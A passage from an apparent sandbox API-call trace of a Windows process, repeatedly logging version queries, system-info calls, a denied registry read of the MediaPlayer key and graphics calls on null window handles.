hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.186] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.186] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.186] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.186] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.186] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.186] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.186] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.186] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.186] BeginPath (hdc=0x0) returned 0 [0092.186] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.186] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.186] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.186] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.186] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.186] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.186] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.186] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.187] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.187] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.187] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.187] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.187] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.187] BeginPath (hdc=0x0) returned 0 [0092.187] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.187] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.187] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.187] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.187] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.187] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.187] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.187] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.187] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.187] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.187] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.187] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.187] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.187] BeginPath (hdc=0x0) returned 0 [0092.187] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.187] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.187] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.187] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.187] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.187] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.187] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.187] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.188] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.188] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.188] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.188] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.188] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.188] BeginPath (hdc=0x0) returned 0 [0092.188] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.188] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.188] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.188] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.188] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.188] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.188] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.188] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.188] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.188] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.188] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.188] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.188] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.188] BeginPath (hdc=0x0) returned 0 [0092.188] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.188] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.188] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.188] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.189] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.189] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.189] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.189] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.189] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.189] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.189] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.189] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.189] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.189] BeginPath (hdc=0x0) returned 0 [0092.189] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.189] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.189] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.189] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.189] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.189] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.189] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.189] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.189] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.189] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.189] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.189] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.189] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.189] BeginPath (hdc=0x0) returned 0 [0092.189] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.189] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.190] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.190] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.190] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.190] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.190] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.190] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.190] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.190] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.190] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.190] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.190] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.190] BeginPath (hdc=0x0) returned 0 [0092.190] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.190] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.190] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.190] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.190] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.190] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.190] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.190] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.190] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.190] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.190] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.190] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.190] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.190] BeginPath (hdc=0x0) returned 0 [0092.190] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.191] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.191] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.191] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.191] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.191] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.191] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.191] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.191] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.191] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.191] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.191] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.191] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.191] BeginPath (hdc=0x0) returned 0 [0092.191] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.191] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.191] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.191] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.191] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.191] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.191] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.191] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.192] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.192] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.192] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.192] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.192] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.192] BeginPath (hdc=0x0) returned 0 [0092.192] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.192] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.192] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.192] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.192] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.192] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.192] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.192] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.192] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.192] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.192] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.192] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.192] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.192] BeginPath (hdc=0x0) returned 0 [0092.192] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.192] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.192] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.192] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.192] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.192] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.192] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.193] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.193] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.193] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.193] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.193] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.193] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.193] BeginPath (hdc=0x0) returned 0 [0092.193] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.193] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.193] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.193] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.193] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.193] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.193] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.193] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.193] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, 